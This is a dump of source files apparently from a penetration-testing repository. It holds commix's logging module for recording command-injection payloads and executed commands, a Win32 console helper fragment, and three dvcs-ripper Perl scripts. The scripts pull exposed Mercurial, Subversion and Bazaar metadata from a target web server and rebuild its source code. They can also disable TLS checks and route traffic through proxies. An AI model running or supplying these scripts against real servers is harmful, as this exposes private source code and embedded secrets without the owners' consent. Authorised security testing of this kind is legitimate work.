141 | # 1 should clear from the cursor to the beginning of the line. 142 | # 2 should clear the entire line. 143 | handle = win32.STDOUT 144 | if on_stderr: 145 | handle = win32.STDERR 146 | csbi = win32.GetConsoleScreenBufferInfo(handle) 147 | if mode == 0: 148 | from_coord = csbi.dwCursorPosition 149 | cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X 150 | if mode == 1: 151 | from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) 152 | cells_to_erase = csbi.dwCursorPosition.X 153 | elif mode == 2: 154 | from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) 155 | cells_to_erase = csbi.dwSize.X 156 | # fill the entire screen with blanks 157 | win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) 158 | # now set the buffer's attributes accordingly 159 | win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) 160 | 161 | def set_title(self, title): 162 | win32.SetConsoleTitle(title) 163 | -------------------------------------------------------------------------------- /commix/src/utils/logs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
14 | """ 15 | 16 | import os 17 | import re 18 | import sys 19 | import time 20 | import urllib 21 | import sqlite3 22 | import datetime 23 | 24 | from src.utils import menu 25 | from src.utils import settings 26 | from src.utils import session_handler 27 | 28 | from src.thirdparty.colorama import Fore, Back, Style, init 29 | 30 | readline_error = False 31 | if settings.IS_WINDOWS: 32 | try: 33 | import readline 34 | except ImportError: 35 | try: 36 | import pyreadline as readline 37 | except ImportError: 38 | readline_error = True 39 | else: 40 | try: 41 | import readline 42 | if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): 43 | import gnureadline as readline 44 | except ImportError: 45 | try: 46 | import gnureadline as readline 47 | except ImportError: 48 | readline_error = True 49 | pass 50 | 51 | 52 | """ 53 | 1. Generate injection logs (logs.txt) in "./ouput" file. 54 | 2. Check for logs updates and apply if any! 55 | """ 56 | 57 | """ 58 | Save command history. 59 | """ 60 | def save_cmd_history(): 61 | cli_history = os.path.expanduser(settings.CLI_HISTORY) 62 | if os.path.exists(cli_history): 63 | readline.write_history_file(cli_history) 64 | 65 | """ 66 | Load commands from history. 67 | """ 68 | def load_cmd_history(): 69 | cli_history = os.path.expanduser(settings.CLI_HISTORY) 70 | if os.path.exists(cli_history): 71 | readline.read_history_file(cli_history) 72 | 73 | """ 74 | Create log files 75 | """ 76 | def create_log_file(url, output_dir): 77 | if not output_dir.endswith("/"): 78 | output_dir = output_dir + "/" 79 | 80 | parts = url.split('//', 1) 81 | try: 82 | host = parts[1].split('/', 1)[0] 83 | except IndexError: 84 | host = parts[0].split('/', 1)[0] 85 | 86 | # Check if port is defined to host. 
87 | if ":" in host: 88 | host = host.replace(":","_") 89 | 90 | try: 91 | os.stat(output_dir + host + "/") 92 | except: 93 | os.mkdir(output_dir + host + "/") 94 | 95 | # Create cli history file if does not exists. 96 | settings.CLI_HISTORY = output_dir + host + "/" + "cli_history" 97 | if not os.path.exists(settings.CLI_HISTORY): 98 | open(settings.CLI_HISTORY,'a').close() 99 | 100 | if menu.options.session_file is not None: 101 | if os.path.exists(menu.options.session_file): 102 | settings.SESSION_FILE = menu.options.session_file 103 | else: 104 | err_msg = "The provided session file ('" + \ 105 | menu.options.session_file + \ 106 | "') does not exists." 107 | print settings.print_critical_msg(err_msg) 108 | sys.exit(0) 109 | else: 110 | settings.SESSION_FILE = output_dir + host + "/" + "session" + ".db" 111 | 112 | # Load command history 113 | load_cmd_history() 114 | 115 | # The logs filename construction. 116 | filename = output_dir + host + "/" + settings.OUTPUT_FILE 117 | output_file = open(filename, "a") 118 | output_file.write("\n" + "=" * 37) 119 | output_file.write("\n" + "| Started in " + \ 120 | datetime.datetime.fromtimestamp(time.time()).strftime('%m/%d/%Y' + \ 121 | " at " + '%H:%M:%S' + " |")) 122 | output_file.write("\n" + "=" * 37) 123 | output_file.write("\n" + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + "Tested URL : " + url) 124 | output_file.close() 125 | 126 | return filename 127 | 128 | """ 129 | Add the injection type / technique in log files. 
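"""
def add_type_and_technique(export_injection_info, filename, injection_type, technique):
    """Append the injection type and technique to the log file, once.

    When export_injection_info equals False the two entries are appended,
    settings.SHOW_LOGS_MSG is switched on and True is returned. Any other
    value is returned unchanged and nothing is written.
    """
    # Kept as an equality test against False so that other falsy values
    # (None, "") are still passed through untouched.
    if export_injection_info != False:
        return export_injection_info

    settings.SHOW_LOGS_MSG = True
    success_sign = re.sub(settings.ANSI_COLOR_REMOVAL, "", settings.SUCCESS_SIGN)
    # The with-block closes the handle even when a write raises.
    with open(filename, "a") as output_file:
        output_file.write("\n" + success_sign + "Type: " + injection_type.title())
        output_file.write("\n" + success_sign + "Technique: " + technique.title())
    return True


def add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload):
    """Append the vulnerable parameter entry to the log file.

    header_name and the_type are used without their first character. When the
    remaining header name is "cookie" or empty, the entry is written as
    "(cookie) <parameter>" or "(<HTTP method>) <parameter>" respectively.
    vp_flag and payload are accepted but not used by this function.
    """
    name = header_name[1:]
    if name == "cookie":
        label = "(" + name + ") " + vuln_parameter
    elif name == "":
        label = "(" + http_request_method + ") " + vuln_parameter
    else:
        label = name

    success_sign = re.sub(settings.ANSI_COLOR_REMOVAL, "", settings.SUCCESS_SIGN)
    with open(filename, "a") as output_file:
        output_file.write("\n" + success_sign + the_type[1:].title() + ": " + label)
        output_file.write("\n")


def update_payload(filename, counter, payload):
    """Append one numbered payload entry to the log file.

    A payload containing a newline is written with the newline shown as the
    two characters "\\n" and URL-unquoted, so each entry stays on one log
    line. "%20" is shown as a space in both cases.
    """
    if "\n" in payload:
        shown = urllib.unquote_plus(payload.replace("\n", "\\n"))
    else:
        shown = payload
    with open(filename, "a") as output_file:
        output_file.write(" (" + str(counter) + ") Payload: " + shown.replace("%20", " ") + "\n")

"""
Add any executed command and
execution output result in log files.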
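"""
def executed_command(filename, cmd, output):
    """Append an executed command and its output to the log file.

    A TypeError raised while building an entry (for instance when cmd or
    output is not a string) is ignored on purpose: logging is best effort.
    """
    try:
        success_sign = re.sub(settings.ANSI_COLOR_REMOVAL, "", settings.SUCCESS_SIGN)
        info_sign = re.sub(settings.ANSI_COLOR_REMOVAL, "", settings.INFO_SIGN)
        # The with-block closes the handle when the second write raises
        # after the first one went through.
        with open(filename, "a") as output_file:
            output_file.write(success_sign + "Executed command: " + cmd + "\n")
            output_file.write(" " + info_sign + "Execution output: " + output + "\n")
    except TypeError:
        # Deliberately best effort: an entry that cannot be built is dropped.
        pass


def logs_notification(filename):
    """Print where the log file can be found.

    The location is built as the current working directory plus filename.
    """
    info_msg = "The results can be found at '" + os.getcwd() + "/" + filename + "'"
    print settings.print_info_msg(info_msg)


def log_traffic(header):
    """Append header to the traffic file named by menu.options.traffic_file."""
    with open(menu.options.traffic_file, "a") as output_file:
        output_file.write(header)


def print_logs_notification(filename, url):
    """Save the command history and print the log location when enabled.

    The location is printed only when settings.SHOW_LOGS_MSG is True. When
    url is truthy, session_handler.clear(url) is called afterwards.
    """
    save_cmd_history()
    if settings.SHOW_LOGS_MSG == True:
        logs_notification(filename)
    if url:
        session_handler.clear(url)

# eof
-------------------------------------------------------------------------------- /dvcs-ripper/rip-hg.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use HTTP::Response; 10 | use Getopt::Long; 11 | 12 | use File::Path qw(make_path); 13 | use File::Basename; 14 | 15 | 16 | my $configfile="$ENV{HOME}/.rip-hg"; 17 | my %config; 18 | $config{'hgdir'} = ".hg"; 19 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 20 | $config{'verbose'}=0; 21 | $config{'checkout'}=1; 22 | 23 | $config{'respdetectmax'}=3; 24 | $config{'resp404size'}=256; 25 |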
$config{'resp404reqsize'}=32; 26 | 27 | sub randomstr { 28 | my($num) = @_; 29 | my @chars = ("A".."Z", "a".."z"); 30 | my $string; 31 | $string .= $chars[rand @chars] for 1..$num; 32 | return $string; 33 | } 34 | 35 | if (-e $configfile) { 36 | open(CONFIG,"<$configfile") or next; 37 | while () { 38 | chomp; # no newline 39 | s/#.*//; # no comments 40 | s/^\s+//; # no leading white 41 | s/\s+$//; # no trailing white 42 | next unless length; # anything left? 43 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 44 | $config{$var} = $value; 45 | } 46 | close(CONFIG); 47 | } 48 | 49 | Getopt::Long::Configure ("bundling"); 50 | 51 | my $result = GetOptions ( 52 | "a|agent=s" => \$config{'agent'}, 53 | "b|branch=s" => \$config{'branch'}, 54 | "u|url=s" => \$config{'url'}, 55 | "p|proxy=s" => \$config{'proxy'}, 56 | "c|checkout!" => \$config{'checkout'}, 57 | "s|sslignore!" => \$config{'sslignore'}, 58 | "v|verbose+" => \$config{'verbose'}, 59 | "h|help" => \&help 60 | ); 61 | 62 | my @knownfiles=( 63 | '00changelog.i', 64 | 'dirstate', 65 | 'requires', 66 | 'branch', 67 | 'branchheads.cache', 68 | 'last-message.txt', 69 | 'tags.cache', 70 | 'undo.branch', 71 | 'undo.desc', 72 | 'undo.dirstate', 73 | 'store/00changelog.i', 74 | 'store/00changelog.d', 75 | 'store/00manifest.i', 76 | 'store/00manifest.d', 77 | 'store/fncache', 78 | 'store/undo', 79 | '.hgignore' 80 | ); 81 | 82 | my $ua = LWP::UserAgent->new; 83 | 84 | $ua->agent($config{'agent'}); 85 | 86 | if ($config{'sslignore'}) { 87 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 88 | } 89 | if ($config{'proxy'}) { 90 | # for socks proxy make sure you have LWP::Protocol::socks 91 | $ua->proxy(['http', 'https'], $config{'proxy'}); 92 | } 93 | 94 | my $ddir=$config{'hgdir'}."/"; 95 | 96 | mkdir $ddir; 97 | mkdir $ddir."store"; 98 | mkdir $ddir."store/data"; 99 | 100 | print STDERR "[i] Downloading hg files from $config{'url'}\n" if ($config{'verbose'}>0); 101 | 102 | my 
@resp404; 103 | my $respdetectmax=$config{'respdetectmax'}; 104 | print STDERR "[i] Auto-detecting 404 as 200 with $config{'respdetectmax'} requests\n" if ($config{'verbose'}>0); 105 | $config{'resp404correct'}=0; 106 | for (my $i=0; $i<$respdetectmax;$i++) { 107 | my $resp=getreq(randomstr($config{'resp404reqsize'})); 108 | if ($resp->is_success) { 109 | push @resp404, $resp; 110 | } else { 111 | $config{'resp404correct'}=1; 112 | last; # exit loop 113 | } 114 | } 115 | 116 | if ($config{'resp404correct'}) { 117 | print STDERR "[i] Getting correct 404 responses\n"; 118 | } else { 119 | print STDERR "[i] Getting 200 as 404 responses. Adapting...\n"; 120 | my $oldchopresp = substr($resp404[0]->content,0,$config{'resp404size'}); 121 | foreach my $entry (@resp404) { 122 | my $chopresp=substr($entry->content,0,$config{'resp404size'}); 123 | if ($oldchopresp eq $chopresp) { 124 | $oldchopresp=substr($entry->content,0,$config{'resp404size'}); 125 | } else { 126 | print STDERR "[i] 404 responses are different, you will have to customize script source code\n"; 127 | $config{'resp404content'}=$chopresp; 128 | last; # exit loop 129 | } 130 | } 131 | $config{'resp404content'}=$oldchopresp; 132 | } 133 | 134 | foreach my $file (@knownfiles) { 135 | getfile($file,$ddir.$file); 136 | } 137 | 138 | print STDERR "[i] Running hg status to check for missing items\n" if ($config{'verbose'}>0); 139 | my @repfiles; 140 | open(PIPE,"hg status -A |") or die "cannot find hg: $!"; 141 | while () { 142 | chomp; 143 | my @getref = split (/\s+/); 144 | push @repfiles, $getref[1]; # 2nd field is filename 145 | } 146 | close(PIPE); 147 | print STDERR "[i] Got items with hg status: $#repfiles\n" if ($config{'verbose'}>0); 148 | 149 | 150 | my $numfiles=0; 151 | foreach my $file (@repfiles) { 152 | my($filename, $dirs, $suffix) = fileparse($file); 153 | my $rpath="store/data/".$file; 154 | make_path($ddir."store/data/".$dirs); 155 | my $res=getfile($rpath.".d",$ddir.$rpath.".d"); 156 | my 
$res=getfile($rpath.".i",$ddir.$rpath.".i"); 157 | if ($res->is_success) { 158 | if ($config{'checkout'}) { 159 | system("hg revert ".$file); 160 | } 161 | $numfiles++; 162 | 163 | } 164 | } 165 | 166 | my $maxfiles=$#repfiles+1; 167 | print STDERR "[i] Finished ($numfiles of $maxfiles)\n"; 168 | 169 | # -- END 170 | 171 | sub getreq { 172 | my ($file) = @_; 173 | my $furl = $config{'url'}."/".$file; 174 | my $req = HTTP::Request->new(GET => $furl); 175 | # Pass request to the user agent and get a response back 176 | my $res = $ua->request($req); 177 | return $res; 178 | } 179 | 180 | sub getfile { 181 | my ($file,$outfile) = @_; 182 | my $furl = $config{'url'}."/".$file; 183 | my $req = HTTP::Request->new(GET => $furl); 184 | # Pass request to the user agent and get a response back 185 | my $res = $ua->request($req); 186 | if ($res->is_success) { 187 | if (not $config{'resp404correct'}) { 188 | print STDERR "[d] got 200 for $file, but checking content\n" if ($config{'verbose'}>1);; 189 | my $chopresp=substr($res->content,0,$config{'resp404size'}); 190 | if ($chopresp eq $config{'resp404content'}) { 191 | print STDERR "[!] Not found for $file: 404 as 200\n" 192 | if ($config{'verbose'}>0); 193 | return $res; 194 | } 195 | } 196 | print STDERR "[d] found $file\n" if ($config{'verbose'}>0);; 197 | open (out,">$outfile") or die ("cannot open file $outfile: $!"); 198 | print out $res->content; 199 | close (out); 200 | } else { 201 | print STDERR "[!] Not found for $file: ".$res->status_line."\n" 202 | if ($config{'verbose'}>0); 203 | } 204 | return $res; 205 | } 206 | 207 | sub help { 208 | print "DVCS-Ripper: rip-hg.pl. Copyright (C) Kost. 
Distributed under GPL.\n\n"; 209 | print "Usage: $0 [options] -u [hgurl] \n"; 210 | print "\n"; 211 | print " -c perform 'hg revert' on end (default)\n"; 212 | print " -b Use branch (default: $config{'branch'})\n"; 213 | print " -a Use agent (default: $config{'agent'})\n"; 214 | print " -s do not verify SSL cert\n"; 215 | print " -p use proxy for connections\n"; 216 | print " -v verbose (-vv will be more verbose)\n"; 217 | print "\n"; 218 | print "Example: $0 -v -u http://www.example.com/.hg/\n"; 219 | print "Example: $0 # with url and options in $configfile\n"; 220 | print "Example: $0 -v -u -p socks://localhost:1080 http://www.example.com/.hg/\n"; 221 | print "For socks like proxy, make sure you have LWP::Protocol::socks\n"; 222 | 223 | exit 0; 224 | } 225 | 226 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-svn.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use DBI; 8 | use LWP::UserAgent; 9 | use HTTP::Request; 10 | use Getopt::Long; 11 | 12 | my $configfile="$ENV{HOME}/.rip-svn"; 13 | my %config; 14 | $config{'branch'} = "trunk"; 15 | $config{'scmdir'} = ".svn"; 16 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 17 | $config{'verbose'}=0; 18 | $config{'checkout'}=1; 19 | $config{'outdir'}='./'; 20 | $config{'upgrade'}=1; 21 | 22 | if (-e $configfile) { 23 | open(CONFIG,"<$configfile") or next; 24 | while () { 25 | chomp; # no newline 26 | s/#.*//; # no comments 27 | s/^\s+//; # no leading white 28 | s/\s+$//; # no trailing white 29 | next unless length; # anything left? 
30 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 31 | $config{$var} = $value; 32 | } 33 | close(CONFIG); 34 | } 35 | 36 | Getopt::Long::Configure ("bundling"); 37 | 38 | my $result = GetOptions ( 39 | "a|agent=s" => \$config{'agent'}, 40 | "b|branch=s" => \$config{'branch'}, 41 | "u|url=s" => \$config{'url'}, 42 | "c|checkout!" => \$config{'checkout'}, 43 | "s|sslignore!" => \$config{'sslignore'}, 44 | "v|verbose+" => \$config{'verbose'}, 45 | "h|help" => \&help 46 | ); 47 | 48 | my @scmfiles=( 49 | "all-wcprops", 50 | "entries", 51 | "format", 52 | "wc.db" 53 | ); 54 | 55 | if ($config{'verbose'}>3) { 56 | foreach my $key ( keys %config ) 57 | { 58 | print "$key => $config{$key}\n"; 59 | } 60 | } 61 | 62 | my @commits; 63 | my $ua = LWP::UserAgent->new; 64 | $ua->agent($config{'agent'}); 65 | 66 | if ($config{'sslignore'}) { 67 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 68 | } 69 | 70 | # normalize URL 71 | if ($config{'url'} =~ /\/\.svn/) { 72 | $config{'scmurl'} = $config{'url'}; 73 | $config{'regurl'} = $config{'url'}; 74 | $config{'regurl'} =~ s/\/\.svn//; 75 | } else { 76 | $config{'scmurl'} = $config{'url'}."/.svn"; 77 | $config{'regurl'} = $config{'url'}; 78 | } 79 | 80 | createsvndirs($config{'outdir'}); 81 | downloadsvnfiles('',$config{'outdir'}); 82 | 83 | if (-e "$config{'scmdir'}/wc.db") { 84 | print STDERR "[i] Found new SVN client storage format!\n"; 85 | my $dbh = DBI->connect("dbi:SQLite:dbname=.svn/wc.db","",""); 86 | 87 | my $sqlr = 'SELECT id,root,uuid FROM repository'; 88 | my $sth = $dbh->prepare($sqlr) or warn "Couldn't prepare statement '$sqlr': " . $dbh->errstr; 89 | $sth->execute(); 90 | while (my $record = $sth->fetchrow_hashref()) { 91 | print "REP INFO => $record->{'id'}:$record->{'root'}:$record->{'uuid'}\n"; 92 | } 93 | 94 | my $sqlp = "select checksum,compression,md5_checksum from pristine"; 95 | my $sthp = $dbh->prepare($sqlp) or warn "Couldn't prepare statement '$sqlp': " . 
$dbh->errstr; 96 | $sthp->execute(); 97 | while (my $record = $sthp->fetchrow_hashref()) { 98 | print "REC INFO => $record->{'checksum'}:$record->{'compression'}:$record->{'checksum_md5'}\n" if ($config{'verbose'}>1);; 99 | if ($record->{'checksum'} =~ /\$sha1\$/) { 100 | my $nfile=substr ($record->{'checksum'},6); 101 | getobject("$config{'outdir'}/$config{'scmdir'}",$nfile); 102 | } else { 103 | warn("Unknown checksum: $record->{'checksum'}"); 104 | } 105 | } 106 | $dbh->disconnect; 107 | checkout(); 108 | 109 | } else { 110 | if (-e "$config{'scmdir'}/entries") { 111 | print STDERR "[i] Found old SVN client storage format!\n"; 112 | svnentries('',$config{'outdir'}); 113 | if ($config{'checkout'} and $config{'upgrade'}) { 114 | print STDERR "[i] Running upgrade, if you get errors, ignore if using older client\n"; 115 | system("svn upgrade"); 116 | } 117 | checkout(); 118 | print STDERR "[i] Due to limitations, to get full tree - run this utility few times!\n"; 119 | } else { 120 | print STDERR "[i] Could not identify SVN format. 
Are you sure it's SVN there?\n"; 121 | print STDERR "[i] Anyway, take a look at ".$config{'scmurl'}."/"."entries\n"; 122 | } 123 | } 124 | 125 | sub checkout { 126 | if ($config{'checkout'}) { 127 | print STDERR "[i] Trying to revert the tree, if you get error, upgrade your SVN client!\n"; 128 | system("svn revert -R ."); 129 | } 130 | } 131 | 132 | sub createsvndirs { 133 | my ($dir) = @_; 134 | mkdir $dir."/.svn"; 135 | mkdir $dir."/.svn/text-base"; 136 | mkdir $dir."/.svn/pristine"; 137 | mkdir $dir."/.svn/tmp"; 138 | } 139 | 140 | sub downloadsvnfiles { 141 | my ($url,$dir) = @_; 142 | foreach my $file (@scmfiles) { 143 | my $furl = "$url/$config{'scmdir'}/$file"; 144 | getfile($furl,"$dir/$config{'scmdir'}/$file"); 145 | } 146 | } 147 | 148 | sub svnentries { 149 | my ($url, $dir) = @_; 150 | 151 | createsvndirs("$dir"); 152 | my $svnentries = "$dir/$config{'scmdir'}/entries"; 153 | # getfile("/$svnentries","$dir/$svnentries"); 154 | # my $file="$dir/$svnentries"; 155 | 156 | downloadsvnfiles($url,$dir); 157 | 158 | open(SVN,"<$svnentries") or warn ("cannot open entries file '$svnentries': $!\n"); 159 | my $prevline; 160 | while () { 161 | chomp; 162 | if ($_ eq "dir") { 163 | if (not $prevline eq '') { 164 | my $newdir=$prevline; 165 | if (not -e $newdir) { 166 | mkdir $newdir; 167 | svnentries("$url/$newdir","$dir/$newdir"); 168 | } 169 | } 170 | } 171 | 172 | if ($_ eq "file") { 173 | my $newfile=$prevline; 174 | getfile("$url/.svn/text-base/$newfile.svn-base","$dir/.svn/text-base/$newfile.svn-base"); 175 | } 176 | $prevline=$_; 177 | } 178 | close(SVN); 179 | } 180 | 181 | 182 | sub getobject { 183 | my ($gd,$ref) = @_; 184 | my $rdir = substr ($ref,0,2); # first two chars of sha1 is dirname 185 | my $rfile = $ref.".svn-base"; # whole sha1 is filename 186 | mkdir $gd."/pristine/$rdir"; 187 | getfile($config{'scmdir'}."/pristine/$rdir/$rfile",$gd."/pristine/$rdir/$rfile"); 188 | } 189 | 190 | sub getfile { 191 | my ($file,$outfile) = @_; 192 | my $furl = 
$config{'regurl'}."/".$file; 193 | my $req = HTTP::Request->new(GET => $furl); 194 | # Pass request to the user agent and get a response back 195 | my $res = $ua->request($req); 196 | if ($res->is_success) { 197 | print STDERR "[d] found $file\n" if ($config{'verbose'}>1);; 198 | open (out,">$outfile") or die ("cannot open file '$outfile': $!"); 199 | print out $res->content; 200 | close (out); 201 | } else { 202 | print STDERR "[!] Not found for $furl => $file: ".$res->status_line."\n" 203 | if ($config{'verbose'}>1); 204 | } 205 | return $res; 206 | } 207 | 208 | sub help { 209 | print "DVCS-Ripper: rip-svn.pl. Copyright (C) Kost. Distributed under GPL.\n\n"; 210 | print "Usage: $0 [options] -u [svnurl] \n"; 211 | print "\n"; 212 | print " -c perform 'checkout' on end (default)\n"; 213 | print " -b Use branch (default: $config{'branch'})\n"; 214 | print " -a Use agent (default: $config{'agent'})\n"; 215 | print " -s ignore SSL certification verification\n"; 216 | print " -v verbose (-vv will be more verbose)\n"; 217 | print "\n"; 218 | 219 | print "Example: $0 -v -u http://www.example.com/.svn/\n"; 220 | print "Example: $0 # with url and options in $configfile\n"; 221 | 222 | exit 0; 223 | } 224 | 225 | -------------------------------------------------------------------------------- /dvcs-ripper/rip-bzr.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use strict; 4 | 5 | use IO::Socket::SSL; 6 | use LWP; 7 | use LWP::UserAgent; 8 | use HTTP::Request; 9 | use HTTP::Response; 10 | use Getopt::Long; 11 | use Cwd; 12 | 13 | my $configfile="$ENV{HOME}/.rip-bzr"; 14 | my %config; 15 | $config{'bzrdir'} = ".bzr"; 16 | $config{'agent'} = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'; 17 | $config{'verbose'}=0; 18 | $config{'checkout'}=1; 19 | 20 | $config{'respdetectmax'}=3; 21 | $config{'resp404size'}=256; 22 | $config{'resp404reqsize'}=32; 23 | 24 | sub randomstr { 
25 | my($num) = @_; 26 | my @chars = ("A".."Z", "a".."z"); 27 | my $string; 28 | $string .= $chars[rand @chars] for 1..$num; 29 | return $string; 30 | } 31 | 32 | if (-e $configfile) { 33 | open(CONFIG,"<$configfile") or next; 34 | while () { 35 | chomp; # no newline 36 | s/#.*//; # no comments 37 | s/^\s+//; # no leading white 38 | s/\s+$//; # no trailing white 39 | next unless length; # anything left? 40 | my ($var, $value) = split(/\s*=\s*/, $_, 2); 41 | $config{$var} = $value; 42 | } 43 | close(CONFIG); 44 | } 45 | 46 | Getopt::Long::Configure ("bundling"); 47 | 48 | my $result = GetOptions ( 49 | "a|agent=s" => \$config{'agent'}, 50 | "b|branch=s" => \$config{'branch'}, 51 | "u|url=s" => \$config{'url'}, 52 | "p|proxy=s" => \$config{'proxy'}, 53 | "c|checkout!" => \$config{'checkout'}, 54 | "s|sslignore!" => \$config{'sslignore'}, 55 | "v|verbose+" => \$config{'verbose'}, 56 | "h|help" => \&help 57 | ); 58 | 59 | my @knownfiles=( 60 | 'branch-format', 61 | 'branch/branch.conf', 62 | 'branch/format', 63 | 'branch/last-revision', 64 | 'branch/tags', 65 | 'checkout/conflicts', 66 | 'checkout/dirstate', 67 | 'checkout/format', 68 | 'checkout/merge-hashes', 69 | 'checkout/views', 70 | 'repository/format', 71 | 'repository/pack-names' 72 | ); 73 | 74 | my $ua = LWP::UserAgent->new; 75 | 76 | $ua->agent($config{'agent'}); 77 | 78 | if ($config{'sslignore'}) { 79 | $ua->ssl_opts(SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE, verify_hostname => 0); 80 | } 81 | if ($config{'proxy'}) { 82 | # for socks proxy make sure you have LWP::Protocol::socks 83 | $ua->proxy(['http', 'https'], $config{'proxy'}); 84 | } 85 | 86 | my $ddir=$config{'bzrdir'}."/"; 87 | 88 | mkdir $ddir; 89 | mkdir $ddir."branch"; 90 | mkdir $ddir."checkout"; 91 | mkdir $ddir."repository"; 92 | mkdir $ddir."repository/indices"; 93 | mkdir $ddir."repository/packs"; 94 | 95 | print STDERR "[i] Downloading bzr files from $config{'url'}\n" if ($config{'verbose'}>0); 96 | 97 | my @resp404; 98 | my 
$respdetectmax=$config{'respdetectmax'}; 99 | print STDERR "[i] Auto-detecting 404 as 200 with $config{'respdetectmax'} requests\n" if ($config{'verbose'}>0); 100 | $config{'resp404correct'}=0; 101 | for (my $i=0; $i<$respdetectmax;$i++) { 102 | my $resp=getreq(randomstr($config{'resp404reqsize'})); 103 | if ($resp->is_success) { 104 | push @resp404, $resp; 105 | } else { 106 | $config{'resp404correct'}=1; 107 | last; # exit loop 108 | } 109 | } 110 | 111 | if ($config{'resp404correct'}) { 112 | print STDERR "[i] Getting correct 404 responses\n"; 113 | } else { 114 | print STDERR "[i] Getting 200 as 404 responses. Adapting...\n"; 115 | my $oldchopresp = substr($resp404[0]->content,0,$config{'resp404size'}); 116 | foreach my $entry (@resp404) { 117 | my $chopresp=substr($entry->content,0,$config{'resp404size'}); 118 | if ($oldchopresp eq $chopresp) { 119 | $oldchopresp=substr($entry->content,0,$config{'resp404size'}); 120 | } else { 121 | print STDERR "[i] 404 responses are different, you will have to customize script source code\n"; 122 | $config{'resp404content'}=$chopresp; 123 | last; # exit loop 124 | } 125 | } 126 | $config{'resp404content'}=$oldchopresp; 127 | } 128 | 129 | foreach my $file (@knownfiles) { 130 | getfile($file,$ddir.$file); 131 | } 132 | 133 | 134 | my $tofetch=0; 135 | my $fetched=0; 136 | my $pcount=1; 137 | my $fcount=0; 138 | while ($pcount>0) { 139 | print STDERR "[i] Running bzr check to check for missing items\n" if ($config{'verbose'}>0); 140 | open(PIPE,"bzr check 2>&1 |") or die "cannot find bzr: $!"; 141 | $pcount=0; 142 | $fcount=0; 143 | while () { 144 | print $_ if ($config{'verbose'}>9); 145 | chomp; 146 | if (/ERROR:/) { 147 | $tofetch++; 148 | m/'(.*?)'/; 149 | my $missingfile = $1; 150 | my $curdir = getcwd."/".$config{'bzrdir'}."/"; 151 | substr $missingfile, index($missingfile, $curdir), length $curdir, ''; 152 | print STDERR "[i] Getting $missingfile\n" if ($config{'verbose'}>0); 153 | my 
$res=getfile($missingfile,$ddir.$missingfile); 154 | if ($res->is_success) { 155 | $fcount++; 156 | $fetched++; 157 | } 158 | $pcount++; 159 | } 160 | } 161 | close(PIPE); 162 | print STDERR "[i] Got items with bzr check: $pcount\n" if ($config{'verbose'}>0); 163 | print STDERR "[i] Items fetched: $fcount\n" if ($config{'verbose'}>0); 164 | if ($fcount == 0) { 165 | last; 166 | } 167 | } 168 | 169 | print STDERR "[i] Finished fetching ($fetched/$tofetch)\n"; 170 | 171 | if ($config{'checkout'}) { 172 | print STDERR "[i] Checking out/Reverting source by calling bzr revert\n"; 173 | system("bzr revert"); 174 | } 175 | 176 | # -- END 177 | 178 | sub getreq { 179 | my ($file) = @_; 180 | my $furl = $config{'url'}."/".$file; 181 | my $req = HTTP::Request->new(GET => $furl); 182 | # Pass request to the user agent and get a response back 183 | my $res = $ua->request($req); 184 | return $res; 185 | } 186 | 187 | sub getfile { 188 | my ($file,$outfile) = @_; 189 | my $furl = $config{'url'}."/".$file; 190 | my $req = HTTP::Request->new(GET => $furl); 191 | # Pass request to the user agent and get a response back 192 | my $res = $ua->request($req); 193 | if ($res->is_success) { 194 | if (not $config{'resp404correct'}) { 195 | print STDERR "[d] got 200 for $file, but checking content\n" if ($config{'verbose'}>1);; 196 | my $chopresp=substr($res->content,0,$config{'resp404size'}); 197 | if ($chopresp eq $config{'resp404content'}) { 198 | print STDERR "[!] Not found for $file: 404 as 200\n" 199 | if ($config{'verbose'}>0); 200 | return $res; 201 | } 202 | } 203 | print STDERR "[d] found $file\n" if ($config{'verbose'}>0);; 204 | open (out,">$outfile") or die ("cannot open file $outfile: $!"); 205 | print out $res->content; 206 | close (out); 207 | } else { 208 | print STDERR "[!] Not found for $file: ".$res->status_line."\n" 209 | if ($config{'verbose'}>0); 210 | } 211 | return $res; 212 | } 213 | 214 | sub help { 215 | print "DVCS-Ripper: rip-bzr.pl. Copyright (C) Kost. 
